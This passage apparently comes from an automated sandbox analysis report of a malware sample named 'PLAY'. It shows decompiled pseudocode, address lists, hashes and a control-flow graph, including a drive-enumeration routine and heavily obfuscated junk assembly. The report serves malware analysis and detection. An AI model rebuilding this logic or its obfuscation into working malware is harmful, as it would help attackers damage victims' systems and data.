									_t420 = _t419 - ( *(_t429 - 0x2b2) & 0x000000ff);
									 *((short*)(_t429 - 0x2ac)) = _t420;
									 *((short*)(_t429 - 0x338)) = _t420;
									_t418 =  *(_t429 - 0x2bc);
									_t369 = _t405 * _t422;
									_t402 =  *(_t429 - 0x2b0);
									_t325 = ( *(_t429 - 0x2a6) & 0x000000ff) + _t418;
									__eflags = _t325;
									 *((intOrPtr*)(_t429 - 0x2b8)) = _t369;
									 *(_t429 - 0x29e) = _t325;
									 *(_t429 - 0x31a) = _t325;
									goto L25;
								}
								_t406 =  *(_t429 - 0x2d8);
								_t380 =  *((intOrPtr*)(_t429 - 0x2ac)) + _t406;
								 *(_t429 - 0x2cc) =  *(_t429 - 0x2cc) + 1;
								 *(_t429 - 0x2f4) =  *(_t429 - 0x2f4) + 0xfffffffb;
								 *((short*)(_t429 - 0x2ac)) = _t380;
								asm("adc dword [ebp-0x2c8], 0xffffffff");
								_t320 = _t319 + 0xfffffffb;
								 *((char*)(_t429 - 0x29b)) =  *((char*)(_t429 - 0x29b)) - 1;
								 *((short*)(_t429 - 0x338)) = _t380;
								_t382 =  *((intOrPtr*)(_t429 - 0x30c)) + _t406;
								 *(_t429 - 0x2a4) = _t348;
								 *(_t429 - 0x2ec) = _t422 - 5;
								 *((intOrPtr*)(_t429 - 0x30c)) = _t382;
								 *((short*)(_t429 - 0x330)) = _t382;
								 *(_t429 - 0x2bc) = _t320;
								 *(_t429 - 0x31c) = _t320;
								_t440 = _t431 - 8;
								__eflags = 0x2d - 0x52;
								if(0x2d == 0x52) {
									_t440 = _t440 + 0x139;
								}
								L31();
								asm("adc eax, 0x49272a6e");
								asm("jecxz 0x4f");
								asm("out 0xe6, eax");
								asm("fimul dword [eax+0x2]");
								asm("in eax, dx");
								 *0xaf511e3e =  *0xaf511e3e << 0x9e;
								asm("adc ecx, [edi]");
								asm("in al, dx");
								 *0x0000006A = _t320;
								_push(0xfffffff1);
								asm("invalid");
								asm("sbb [ecx-0x271d18ee], esp");
								 *0x2d =  *0x2d - 1;
								asm("invalid");
								asm("jecxz 0xffffff85");
								 *0xb0ebec4f =  *0xb0ebec4f + 0x36;
								__eflags =  *0xb0ebec4f;
								return _t320;
								goto L62;
								L25:
								__eflags =  *(_t429 - 0x2d0) - _t369;
								if( *(_t429 - 0x2d0) > _t369) {
									 *((short*)(_t429 - 0x384)) =  *((short*)(_t429 - 0x384)) + 1;
									_t312 = _t402 + _t422;
									 *((intOrPtr*)(_t429 - 0x340)) = _t312;
									 *((short*)(_t429 - 0x382)) = _t312;
									_t315 = ( *(_t429 - 0x2a8) & 0x000000ff) * (_t348 & 0x0000ffff);
									_t348 = _t348 - 1;
									__eflags = _t348;
									 *(_t429 - 0x2c4) = _t315;
									 *(_t429 - 0x332) = _t315;
								}
								 *(_t429 - 0x2cc) =  *(_t429 - 0x2cc) + 1;
								 *(_t429 - 0x2d4) =  *(_t429 - 0x2d4) + 0xc;
								 *((short*)(_t429 - 0x380)) = ( *(_t429 - 0x2ff) & 0x000000ff) +  *(_t429 - 0x336);
								_t310 =  *(_t429 - 0x31a) +  *(_t429 - 0x3a6) * 2;
								 *(_t429 - 0x2d0) = _t310;
								 *(_t429 - 0x3a6) = _t310;
								_t348 = _t348 - ( *(_t429 - 0x2a7) & 0x000000ff) + ( *(_t429 - 0x2a8) & 0x000000ff);
								 *(_t429 - 0x2b0) =  *(_t429 - 0x2b0) - 1;
								_t369 =  *((intOrPtr*)(_t429 - 0x2b8));
							}
						}
					}
				} else {
					return E00AF7B30( *(_t429 - 4) ^ _t429);
				}
				L62:
			}

































































          0x00af26e9
          0x00af26f4
          0x00af26f9
          0x00af26ff
          0x00af2707
          0x00af270e
          0x00af271a
          0x00af2722
          0x00af2727
          0x00af272f
          0x00af2734
          0x00af273b
          0x00af2742
          0x00af2747
          0x00af274e
          0x00af2755
          0x00af275d
          0x00af2762
          0x00af2763
          0x00af2765
          0x00af276c
          0x00af2773
          0x00af277a
          0x00af2781
          0x00af2788
          0x00af2790
          0x00af2798
          0x00af279f
          0x00af27a6
          0x00af27ad
          0x00af27b4
          0x00af27bb
          0x00af27c3
          0x00af27cb
          0x00af27d3
          0x00af27db
          0x00af27e3
          0x00af27eb
          0x00af27f2
          0x00af27f9
          0x00af2800
          0x00af2807
          0x00af280e
          0x00af2816
          0x00af281c
          0x00af2823
          0x00af282d
          0x00af2833
          0x00af2839
          0x00af2843
          0x00af2849
          0x00af2850
          0x00af2857
          0x00af285f
          0x00af2866
          0x00af2881
          0x00af2883
          0x00af2889
          0x00af288b
          0x00af288d
          0x00af28fc
          0x00af2902
          0x00af288f
          0x00af2899
          0x00af289f
          0x00af289f
          0x00af28a8
          0x00af28ae
          0x00af28b4
          0x00af28b4
          0x00af28b7
          0x00af28b9
          0x00af28c5
          0x00af28cc
          0x00af28cd
          0x00af28d3
          0x00af28d6
          0x00af28dd
          0x00af28dd
          0x00af28dd
          0x00af28e3
          0x00af28e6
          0x00af28e9
          0x00af28e9
          0x00af28e9
          0x00af28ee
          0x00af28f4
          0x00af28f4
          0x00af2916
          0x00af291d
          0x00af2920
          0x00af2923
          0x00af2925
          0x00af292b
          0x00af292d
          0x00af293a
          0x00af2940
          0x00af294a
          0x00af2951
          0x00af2f46
          0x00af2f4c
          0x00af2f59
          0x00af2f66
          0x00000000
          0x00af2957
          0x00af2957
          0x00af295d
          0x00af2f13
          0x00af2f20
          0x00af2f2d
          0x00af2f3a
          0x00af2f6c
          0x00af2f6c
          0x00af2f72
          0x00af2f79
          0x00af2f7f
          0x00af2f81
          0x00af2f87
          0x00af2f90
          0x00af2f9a
          0x00af2fa1
          0x00af2fa1
          0x00af2fa1
          0x00af2f90
          0x00af2fa6
          0x00af2fa8
          0x00af3152
          0x00af3152
          0x00af3152
          0x00af3157
          0x00af315a
          0x00af315c
          0x00af315c
          0x00af3162
          0x00af3165
          0x00af316e
          0x00af316e
          0x00af3179
          0x00af317f
          0x00af3181
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00af319b
          0x00af319b
          0x00af3123
          0x00af3124
          0x00af3125
          0x00af3129
          0x00af312a
          0x00af3130
          0x00af3133
          0x00af3133
          0x00af313b
          0x00af3143
          0x00af3144
          0x00af314a
          0x00af3150
          0x00000000
          0x00000000
          0x00af30f0
          0x00af30f7
          0x00af30fd
          0x00af3104
          0x00af3106
          0x00af3108
          0x00af3108
          0x00af310e
          0x00af3111
          0x00af3116
          0x00af3116
          0x00af3117
          0x00000000
          0x00af3119
          0x00af3119
          0x00af3119
          0x00af311d
          0x00af311d
          0x00000000
          0x00af3117
          0x00af3133
          0x00af2fae
          0x00af2fb8
          0x00af2fbe
          0x00af2fc0
          0x00af2fce
          0x00af2fce
          0x00af2fd1
          0x00af2fe0
          0x00af2fe9
          0x00af2feb
          0x00af2fef
          0x00000000
          0x00000000
          0x00af2ff4
          0x00af2ff5
          0x00af2ffa
          0x00af2fff
          0x00af3007
          0x00af300a
          0x00af3012
          0x00af301e
          0x00af3025
          0x00af3026
          0x00af302c
          0x00af3033
          0x00af303a
          0x00af3040
          0x00af3042
          0x00af304d
          0x00af3054
          0x00af305a
          0x00af305a
          0x00af305a
          0x00000000
          0x00af305a
          0x00af3068
          0x00af306e
          0x00af3075
          0x00af3077
          0x00af3079
          0x00af3079
          0x00af3082
          0x00af3087
          0x00af308c
          0x00af308e
          0x00af3090
          0x00af3093
          0x00af3094
          0x00af309b
          0x00af309d
          0x00af309e
          0x00af30a1
          0x00af30a3
          0x00af30ac
          0x00af30b2
          0x00af30b4
          0x00af30b7
          0x00af30b8
          0x00af30b8
          0x00af30bc
          0x00000000
          0x00af3060
          0x00af3060
          0x00af3060
          0x00af2fe0
          0x00af2963
          0x00af297d
          0x00af298d
          0x00af299a
          0x00af29a7
          0x00af29b4
          0x00af29c1
          0x00af29ce
          0x00af29d5
          0x00af29dc
          0x00af29e9
          0x00af29f0
          0x00af29f7
          0x00af29fd
          0x00af2a04
          0x00af2a0a
          0x00af2a1e
          0x00af2a20
          0x00af2a26
          0x00af2a33
          0x00af2a39
          0x00af2a46
          0x00af2a46
          0x00af2a49
          0x00af2a50
          0x00af2a56
          0x00af2a5f
          0x00af2a65
          0x00af2a69
          0x00000000
          0x00000000
          0x00af2a72
          0x00af2a73
          0x00af2a78
          0x00af2a7d
          0x00af2a83
          0x00af2a8c
          0x00af2a92
          0x00af2a99
          0x00af2a9b
          0x00af2aa1
          0x00af2aa7
          0x00af2b17
          0x00af2b20
          0x00af2b32
          0x00af2b56
          0x00af2b58
          0x00af2b58
          0x00af2b5e
          0x00af2aa9
          0x00af2ab5
          0x00af2abb
          0x00af2acb
          0x00af2ad1
          0x00af2ad3
          0x00af2ae7
          0x00af2af4
          0x00af2afe
          0x00af2b00
          0x00af2b07
          0x00af2b07
          0x00af2b64
          0x00af2b64
          0x00af2b6a
          0x00af2b70
          0x00af2b73
          0x00af2b79
          0x00af2b99
          0x00af2b7b
          0x00af2b81
          0x00af2b91
          0x00af2b91
          0x00af2ba0
          0x00af2ba2
          0x00af2ba8
          0x00af2bab
          0x00af2bb7
          0x00af2bc7
          0x00af2bce
          0x00af2bd4
          0x00af2bdb
          0x00af2be1
          0x00af2bf0
          0x00af2bfc
          0x00af2c03
          0x00af2c0a
          0x00af2c13
          0x00af2c16
          0x00af2c1c
          0x00af2c1c
          0x00af2c1f
          0x00af2c25
          0x00af2c2c
          0x00000000
          0x00af2c2c
          0x00af2cdd
          0x00af2ce3
          0x00af2ce6
          0x00af2cec
          0x00af2cf3
          0x00af2cfa
          0x00af2d01
          0x00af2d04
          0x00af2d0a
          0x00af2d17
          0x00af2d1a
          0x00af2d20
          0x00af2d26
          0x00af2d2c
          0x00af2d33
          0x00af2d39
          0x00af2d40
          0x00af2d47
          0x00af2d49
          0x00af2d4b
          0x00af2d4b
          0x00af2d54
          0x00af2d59
          0x00af2d5e
          0x00af2d60
          0x00af2d62
          0x00af2d65
          0x00af2d66
          0x00af2d6d
          0x00af2d6f
          0x00af2d70
          0x00af2d73
          0x00af2d75
          0x00af2d7e
          0x00af2d84
          0x00af2d86
          0x00af2d89
          0x00af2d8a
          0x00af2d8a
          0x00af2d8e
          0x00000000
          0x00af2c33
          0x00af2c33
          0x00af2c3a
          0x00af2c3c
          0x00af2c43
          0x00af2c46
          0x00af2c4c
          0x00af2c5f
          0x00af2c62
          0x00af2c62
          0x00af2c63
          0x00af2c69
          0x00af2c69
          0x00af2c7c
          0x00af2c82
          0x00af2c93
          0x00af2ca0
          0x00af2caa
          0x00af2cb0
          0x00af2cc0
          0x00af2cc2
          0x00af2cc8
          0x00af2cc8
          0x00af2a50
          0x00af295d
          0x00af2868
          0x00af287b
          0x00af287b
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: 614hJ$@$O
          • API String ID: 0-281852549
          • Opcode ID: d82b4f080b9693be8041247568063b4a3f65b523e480f15b531f2978e43736ec
          • Instruction ID: 652dd76e1f82903ee5c3d5c68fa4a68335882ff86b633bc3101f5f263384579b
          • Opcode Fuzzy Hash: d82b4f080b9693be8041247568063b4a3f65b523e480f15b531f2978e43736ec
          • Instruction Fuzzy Hash: E8325A75D152A98BCB21DF288C997E9BBB4AF19300F0442EAE88CA7251E7304FC5CF15
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE98A4 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 465COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1043 ae98a4-ae98a8 1044 ae98aa-ae98ca 1043->1044 1045 ae9905-ae9a8f call aea280 1043->1045 1049 ae9aae-ae9ab8 1045->1049 1050 ae9a91-ae9a9d 1045->1050 1052 ae9aba-ae9abd 1049->1052 1053 ae9ac8-ae9b92 call aed7d0 call afa532 1049->1053 1051 ae9aa3-ae9aac 1050->1051 1051->1049 1051->1051 1054 ae9ac0-ae9ac6 1052->1054 1059 ae9b98-ae9ba0 1053->1059 1054->1053 1054->1054 1060 ae9ba8-ae9bdc call ae9be6 1059->1060 1061 ae9ba2 1059->1061 1064 ae9bde 1060->1064 1065 ae9bfd-ae9c35 call aedec0 GetDriveTypeW 1060->1065 1061->1060 1064->1065 1068 aea09b-aea0d1 1065->1068 1069 ae9c3b-ae9c3e 1065->1069 1071 aea0d7-aea0de 1068->1071 1069->1068 1070 ae9c44-ae9c4f 1069->1070 1073 ae9c55-ae9c58 1070->1073 1074 aea062 1070->1074 1071->1059 1072 aea0e4-aea0f2 1071->1072 1075 aea138-aea14d call af7b30 1072->1075 1076 aea0f4-aea10c 1072->1076 1077 ae9c5e-ae9c61 1073->1077 1078 ae9d76-ae9d78 1073->1078 1079 aea068-aea094 1074->1079 1080 aea112-aea136 1076->1080 1077->1078 1084 ae9c67-ae9d38 call aed7d0 call afa532 call afa596 1077->1084 1082 ae9d7a-ae9d87 1078->1082 1083 ae9d89-ae9dae 1078->1083 1079->1068 1080->1075 1080->1080 1086 ae9db0-ae9e85 call aeec30 1082->1086 1083->1086 1104 ae9d3a-ae9d66 1084->1104 1105 ae9d6b-ae9d71 1084->1105 1093 ae9eac-ae9edd 1086->1093 1094 ae9e87-ae9e8d 1086->1094 1095 ae9edf-ae9f07 call afa532 1093->1095 1096 ae9f09-ae9f1a call afa532 1093->1096 1094->1093 1098 ae9e8f-ae9ea7 1094->1098 1106 ae9f1d-ae9f44 1095->1106 1096->1106 1098->1071 1107 ae9f47-ae9fd8 call aea150 1104->1107 1105->1107 1106->1107 1110 ae9fda-ae9ffe 1107->1110 1111 aea000-aea060 1107->1111 1110->1079 1111->1079
          C-Code - Quality: 47%
          			E00AE98A4(void* __eax, intOrPtr* __ebx, intOrPtr __edx) {
				char _t241;
				char _t243;
				intOrPtr _t244;
				signed short _t248;
				signed char _t252;
				signed int _t253;
				signed int _t254;
				int _t277;
				signed int _t286;
				signed int _t294;
				void* _t300;
				short _t306;
				short _t310;
				void* _t312;
				intOrPtr _t320;
				short _t327;
				void* _t359;
				void* _t360;
				signed int _t363;
				signed int _t364;
				signed char _t366;
				void* _t370;
				signed int _t371;
				intOrPtr _t374;
				signed int* _t384;
				signed char _t389;
				signed int* _t397;
				signed int _t398;
				signed int _t400;
				intOrPtr _t413;
				signed char _t423;
				signed char _t425;
				void* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t437;
				void* _t438;
				signed short _t441;
				signed short _t442;
				signed short _t444;
				void* _t446;
				int _t450;
				void* _t452;
				intOrPtr* _t453;
				signed int _t455;
				intOrPtr* _t457;
				intOrPtr* _t460;
				void* _t461;

				if(__edx <  *__ebx) {
					asm("movq [ebp-0x304], xmm0");
					_t363 = 0x43d9;
					asm("movq xmm0, [0xb08edc]");
					_t438 = 0xbd0;
					asm("movq [ebp-0x2dc], xmm0");
					asm("movups xmm0, [0xb08ee8]");
					 *((short*)(_t452 - 0x330)) = 0;
					 *((short*)(_t452 - 0x1c)) =  *0xb08ebc & 0x0000ffff;
					_t241 = "recent"; // 0x65636572
					asm("movups [ebp-0x2d0], xmm0");
					 *((intOrPtr*)(_t452 - 0x27c)) = _t241;
					asm("movups xmm0, [0xb08efc]");
					 *((char*)(_t452 - 0x24d)) = 0xac;
					_t243 = "h3xGKYS"; // 0x47783368
					asm("movups [ebp-0x2f8], xmm0");
					 *((intOrPtr*)(_t452 - 0x2a8)) = _t243;
					asm("movq xmm0, [0xb08f0c]");
					_t244 =  *0xb08ed8; // 0x53594b
					asm("movq [ebp-0x2e8], xmm0");
					asm("movups xmm0, [0xb08f18]");
					 *((intOrPtr*)(_t452 - 0x2a4)) = _t244;
					 *((short*)(_t452 - 0x2d4)) =  *0xb08ee4 & 0x0000ffff;
					asm("movups [ebp-0x324], xmm0");
					 *((intOrPtr*)(_t452 - 0x288)) = 1;
					asm("movq xmm0, [0xb08f28]");
					asm("movq [ebp-0x314], xmm0");
					asm("movq xmm0, [0xb08f38]");
					asm("movq [ebp-0x2a0], xmm0");
					_t248 =  *(_t452 - 0x2a0) + _t370;
					 *((char*)(_t452 - 0x270)) = 0xf6;
					 *(_t452 - 0x294) = _t248;
					 *(_t452 - 0x2a0) = _t248;
					asm("cdq");
					 *((char*)(_t452 - 0x255)) = 0xed;
					 *((char*)(_t452 - 0x2b7)) = 0;
					asm("adc edx, 0x0");
					 *((char*)(_t452 - 0x24e)) = 0x80;
					 *((char*)(_t452 - 0x24f)) = 0x38;
					 *((char*)(_t452 - 0x258)) = 0xe2;
					 *((char*)(_t452 - 0x256)) = 0x92;
					 *((char*)(_t452 - 0x2b4)) = 0;
					 *((intOrPtr*)(_t452 - 0x284)) = 0x352;
					 *((intOrPtr*)(_t452 - 0x274)) = 0x3aa;
					 *((intOrPtr*)(_t452 - 0x2ac)) = 0x1bc4;
					 *((intOrPtr*)(_t452 - 0x268)) = 0;
					 *((intOrPtr*)(_t452 - 0x26c)) = (_t248 & 0x0000ffff) + 0x554;
					 *((intOrPtr*)(_t452 - 0x28c)) = __edx;
					E00AEA280(0x43d9, _t370, 0xbd0, 0x5bac); // executed
					_t252 =  *((intOrPtr*)(_t452 - 0x20));
					_t450 = 0x5bad;
					 *(_t452 - 0x2b0) = _t252;
					_t253 = _t252 & 0x000000ff;
					 *((intOrPtr*)(_t452 - 0x24c)) = 0x104;
					if(_t253 > 0x5f) {
						_t413 =  *((intOrPtr*)(_t452 - 0x1c));
						_t360 = _t253 + 0xffffffa1;
						_t437 =  *((intOrPtr*)(_t452 - 0x279));
						_t438 = _t360 + 0xbd0;
						do {
							_t413 = _t413 + 0xf4;
							_t437 = _t437 + 0xee;
							_t360 = _t360 - 1;
						} while (_t360 != 0);
					}
					_t254 =  *(_t452 - 0x27a) & 0x000000ff;
					if(_t254 > 0x5e) {
						_t359 = _t254 + 0xffffffa2;
						do {
							_t450 = _t450 - _t438;
							_t359 = _t359 - 1;
						} while (_t359 != 0);
					}
					_t371 = 0xb0b938;
					_push(_t452 - 0x3c);
					E00AED7D0(_t363, 0xb0b938, 8, _t438, _t450);
					E00AFA532(_t452 - 0x18, 0xa, _t452 - 0x3c);
					_t460 = _t457 - 8 + 0x18;
					 *((intOrPtr*)(_t452 - 0x27c)) = 0x1b;
					 *((char*)(_t452 - 0x257)) =  *((intOrPtr*)(_t452 - 0x2ca)) + 1;
					asm("xorps xmm0, xmm0");
					 *((char*)(_t452 - 0x253)) =  *((intOrPtr*)(_t452 - 0x2a2));
					 *((char*)(_t452 - 0x251)) =  *((intOrPtr*)(_t452 - 0x2a7));
					 *((char*)(_t452 - 0x250)) =  *((intOrPtr*)(_t452 - 0x2d4));
					 *((char*)(_t452 - 0x252)) =  *((intOrPtr*)(_t452 - 0x2d7));
					 *((short*)(_t452 - 0x25e)) =  *((intOrPtr*)(_t452 - 0x2cc));
					 *((short*)(_t452 - 0x25c)) =  *((intOrPtr*)(_t452 - 0x2f4));
					 *((short*)(_t452 - 0x27e)) =  *((intOrPtr*)(_t452 - 0x318));
					 *((short*)(_t452 - 0x280)) =  *((intOrPtr*)(_t452 - 0x31c));
					 *((short*)(_t452 - 0x25a)) =  *((intOrPtr*)(_t452 - 0x324));
					asm("movups [ebp-0x3c], xmm0");
					 *(_t452 - 0x290) =  *(_t452 - 0x29e) & 0x0000ffff;
					while(1) {
						_t461 = _t460 - 0xc;
						if(0x73 <= 0x54) {
							_t461 = _t461 + 0xaa;
						}
						L15();
						asm("int 0x7a");
						_pop(_t453);
						asm("xlatb");
						 *((intOrPtr*)(_t363 + 0xf606c2e)) =  *((intOrPtr*)(_t363 + 0xf606c2e)) - 0x73;
						_t460 = _t453;
						asm("aas");
						asm("rcr byte [edi-0x8], 0x68");
						asm("int 0xe");
						_pop(_t455);
						_push(_t450);
						asm("out dx, eax");
						if((_t371 & 0x5cce6804) >= 0) {
							break;
						}
						_t374 =  *0xb0d688; // 0xcafce837
						E00AEDEC0(_t363, _t374, 0xf3d954b, _t450);
						_t277 = GetDriveTypeW(_t455 - 0x18); // executed
						_t450 = _t277;
						_t364 =  *(_t455 - 0x2ac);
						_t423 =  *((intOrPtr*)(_t455 - 0x257)) - 1 + _t364;
						 *(_t455 - 0x250) = _t423;
						 *(_t455 - 0x254) = _t423;
						if(_t450 == 5 || _t450 == 6) {
							L40:
							_t363 = _t364 + 1;
							 *(_t455 - 0x18) =  *(_t455 - 0x18) + 1;
							 *((char*)(_t455 - 0x24e)) =  *((char*)(_t455 - 0x24e)) - 1;
							 *(_t455 - 0x255) =  *((intOrPtr*)(_t455 - 0x288)) +  *(_t455 - 0x268) + _t423;
							_t371 = ( *(_t455 - 0x2a8) & 0x000000ff) * ( *(_t455 - 0x2ee) & 0x0000ffff);
							 *(_t455 - 0x2ac) = _t363;
							 *(_t455 - 0x284) = _t371;
						} else {
							_t384 =  *(_t455 - 0x264);
							_t286 =  *_t384;
							if(_t286 >= _t384[1]) {
								_t441 =  *(_t455 - 0x294);
								goto L39;
							} else {
								if(_t450 == 4) {
									if(_t423 != 0) {
										 *(_t455 - 0x268) = ( *(_t455 - 0x2a4) & 0x000000ff) -  *((intOrPtr*)(_t455 - 0x288));
										_t294 = ( *(_t455 - 0x27e) & 0x0000ffff) +  *(_t455 - 0x26c) + 0xfffffffe + _t364;
									} else {
										_t294 = ( *(_t455 - 0x2ee) & 0x0000ffff) + 1 + (_t423 & 0x000000ff);
									}
									 *(_t455 - 0x284) = _t294;
									_t444 = ( *(_t455 - 0x270) & 0x000000ff) +  *(_t455 - 0x26c);
									 *(_t455 - 0x2b8) = _t444 & 0x0000ffff;
									 *(_t455 - 0x27e) =  *((intOrPtr*)(_t455 - 0x2ca));
									_push(_t455 - 0x24c);
									 *((intOrPtr*)(_t455 - 0x24c)) = 0x104;
									_push(_t455 - 0x248);
									 *(_t455 - 0x294) = _t444;
									 *(_t455 - 0x2a0) = _t444;
									_t300 = E00AEEC30(_t364, _t455 - 0x18, _t423, _t444, _t450); // executed
									_t426 = _t300;
									_t460 = _t460 + 8;
									_t363 = ( *(_t455 - 0x2a4) & 0x000000ff) *  *(_t455 - 0x268);
									_t389 = ( *(_t455 - 0x2f6) & 0x000000ff) * 0x6c;
									 *((intOrPtr*)(_t455 - 0x288)) = 1;
									 *(_t455 - 0x2ac) = _t363;
									 *(_t455 - 0x270) = _t389;
									_t371 = 0xffff;
									 *((short*)(_t455 - 0x25a)) = ( *(_t455 - 0x2d9) & 0x000000ff) + (_t389 & 0x000000ff) + 0x16c;
									_t306 =  *((intOrPtr*)(_t455 - 0x290)) + 0xffff;
									 *((intOrPtr*)(_t455 - 0x290)) = _t306;
									 *((short*)(_t455 - 0x29e)) = _t306;
									 *(_t455 - 0x268) =  *(_t455 - 0x255) & 0x000000ff;
									if(_t426 == 0 || _t426 == 0x4b1) {
										_t310 =  *(_t455 - 0x2ee) -  *((intOrPtr*)(_t455 - 0x2d0)) - 1;
										 *((intOrPtr*)(_t455 - 0x290)) = _t310;
										 *((short*)(_t455 - 0x29e)) = _t310;
										_t312 =  *( *(_t455 - 0x264)) * 0x218 + ( *(_t455 - 0x264))[2];
										_t393 =  *((intOrPtr*)(_t455 - 0x248));
										if( *((intOrPtr*)(_t455 - 0x248)) == 0) {
											E00AFA532(_t312, 0x104,  *((intOrPtr*)(_t455 - 0x244)));
											_t460 = _t460 + 0xc;
										} else {
											E00AFA532(_t312, 0x104, _t393);
											_t460 = _t460 + 0xc;
											 *(_t455 - 0x270) = ( *(_t455 - 0x2a6) & 0x000000ff) * ( *(_t455 - 0x284) & 0x000000ff);
										}
										_t427 =  *(_t455 - 0x24d);
										 *((char*)(_t455 - 0x256)) =  *((char*)(_t455 - 0x256)) + 0x72;
										 *((char*)(_t455 - 0x252)) =  *((char*)(_t455 - 0x252)) + 0x69;
										 *((intOrPtr*)(_t455 - 0x253)) =  *((intOrPtr*)(_t455 - 0x253)) + _t427 + _t427 + _t427;
										_t446 =  *(_t455 - 0x2b8) + 3;
										 *((char*)(_t455 - 0x24e)) =  *((char*)(_t455 - 0x24e)) + 0x51;
										 *((intOrPtr*)(_t455 - 0x280)) =  *((intOrPtr*)(_t455 - 0x280)) + 0xfffd;
										_t441 = _t446 + 0xfffd;
										_t428 = _t427 - 1;
										 *((char*)(_t455 - 0x24f)) =  *((char*)(_t455 - 0x24f)) + 0x78;
										 *(_t455 - 0x24d) = _t428;
										 *( *( *(_t455 - 0x264)) * 0x218 + ( *(_t455 - 0x264))[2] + 0x210) = _t450;
										_t364 = _t363 + ( *(_t455 - 0x2f6) & 0x0000ffff); // executed
										_t320 = E00AEA150(_t364, _t455 - 0x18, _t441, _t450); // executed
										_t397 =  *(_t455 - 0x264);
										_t450 = _t428;
										_t429 =  *_t397 * 0x218;
										_t398 = _t397[2];
										 *((intOrPtr*)(_t429 + _t398 + 0x208)) = _t320;
										 *(_t455 - 0x2ee) =  *(_t455 - 0x2ee) + 0xffff;
										 *(_t429 + _t398 + 0x20c) = _t450;
										_t431 =  *((intOrPtr*)(_t455 - 0x274)) - 4;
										 *( *(_t455 - 0x264)) =  *( *(_t455 - 0x264)) + 1;
										 *((intOrPtr*)(_t455 - 0x274)) = _t431;
										if(_t364 >= 1) {
											_t400 =  *(_t455 - 0x268) + 1;
											 *(_t455 - 0x26c) =  *(_t455 - 0x26c) + 2;
											asm("adc dword [ebp-0x28c], 0x0");
											 *(_t455 - 0x268) = _t400;
											_t327 = ( *(_t455 - 0x2a6) & 0x000000ff) + 1;
											 *((short*)(_t455 - 0x25a)) = _t431 - ( *(_t455 - 0x24d) & 0x000000ff);
											_t423 =  *(_t455 - 0x254);
											 *((intOrPtr*)(_t455 - 0x290)) = _t327;
											 *((short*)(_t455 - 0x29e)) = _t327;
											_t364 = ( *(_t455 - 0x258) & 0x000000ff) - ( *(_t455 - 0x270) & 0x000000ff) + _t400;
										} else {
											asm("cdq");
											 *((intOrPtr*)(_t455 - 0x28c)) = _t431;
											_t423 =  *(_t455 - 0x254);
											 *((intOrPtr*)(_t455 - 0x288)) = 0;
											 *(_t455 - 0x26c) =  *(_t455 - 0x2f6) & 0x0000ffff;
										}
										L39:
										 *(_t455 - 0x270) =  *(_t455 - 0x270) + 2;
										 *((intOrPtr*)(_t455 - 0x25c)) =  *((intOrPtr*)(_t455 - 0x25c)) + 0xfffe;
										_t442 = _t441 + 2;
										 *(_t455 - 0x294) = _t442;
										 *((intOrPtr*)(_t455 - 0x25e)) =  *((intOrPtr*)(_t455 - 0x25e)) +  *((intOrPtr*)(_t455 - 0x2f2)) +  *((intOrPtr*)(_t455 - 0x2f2));
										 *(_t455 - 0x2a0) = _t442;
										goto L40;
									} else {
										 *(_t455 - 0x18) =  *(_t455 - 0x18) + 1;
										 *((char*)(_t455 - 0x24f)) =  *((intOrPtr*)(_t455 - 0x2d0)) + 1 +  *((intOrPtr*)(_t455 - 0x274));
									}
								} else {
									if (_t450 == 1) goto L25;
									 *_t286 =  *_t286 + _t286;
									 *((intOrPtr*)(_t455 + 0xabad445)) =  *((intOrPtr*)(_t455 + 0xabad445)) + _t384;
								}
							}
						}
						_t226 = _t455 - 0x27c;
						 *_t226 =  *((intOrPtr*)(_t455 - 0x27c)) - 1;
						if( *_t226 != 0) {
							continue;
						} else {
							if(0x453f > 0x453e) {
								_t425 =  *((intOrPtr*)(_t455 - 0x2fd));
								_t366 =  *((intOrPtr*)(_t455 - 0x2ff));
								 *((intOrPtr*)(_t455 - 0x27c)) = 1;
								do {
									_t425 = _t425 + 1;
									_t366 = (_t366 & 0x000000ff) * 0x76;
									_t233 = _t455 - 0x27c;
									 *_t233 =  *((intOrPtr*)(_t455 - 0x27c)) - 1;
									 *(_t455 - 0x2b0) = ( *(_t455 - 0x2b0) & 0x000000ff) * (_t425 & 0x000000ff);
								} while ( *_t233 != 0);
							}
							return E00AF7B30( *(_t455 - 4) ^ _t455);
						}
						goto L46;
					}
					_push(0xf3d954b);
					asm("retf 0xf1e9");
					asm("repe jg 0xffffffd3");
					asm("rcl bh, 1");
					 *_t460 =  *_t460 + 0x4d;
					return 0x37;
				} else {
					asm("aaa");
					asm("daa");
					asm("cmpsd");
					asm("enter 0x898, 0x2");
					asm("aam 0x7a");
					asm("les esi, [edx]");
					0x531c5bf();
					 *_t457 =  *_t457 + 0x4e;
					return 0xb3;
				}
				L46:
			}





















































          0x00ae98a8
          0x00ae990c
          0x00ae9914
          0x00ae9919
          0x00ae9921
          0x00ae9926
          0x00ae992e
          0x00ae9935
          0x00ae9943
          0x00ae9947
          0x00ae994c
          0x00ae9953
          0x00ae995b
          0x00ae9962
          0x00ae9968
          0x00ae996d
          0x00ae9974
          0x00ae997a
          0x00ae9982
          0x00ae9987
          0x00ae998f
          0x00ae9996
          0x00ae99a3
          0x00ae99af
          0x00ae99b6
          0x00ae99c0
          0x00ae99c8
          0x00ae99d0
          0x00ae99d8
          0x00ae99e7
          0x00ae99ea
          0x00ae99f1
          0x00ae99f7
          0x00ae9a01
          0x00ae9a07
          0x00ae9a0e
          0x00ae9a15
          0x00ae9a18
          0x00ae9a1f
          0x00ae9a26
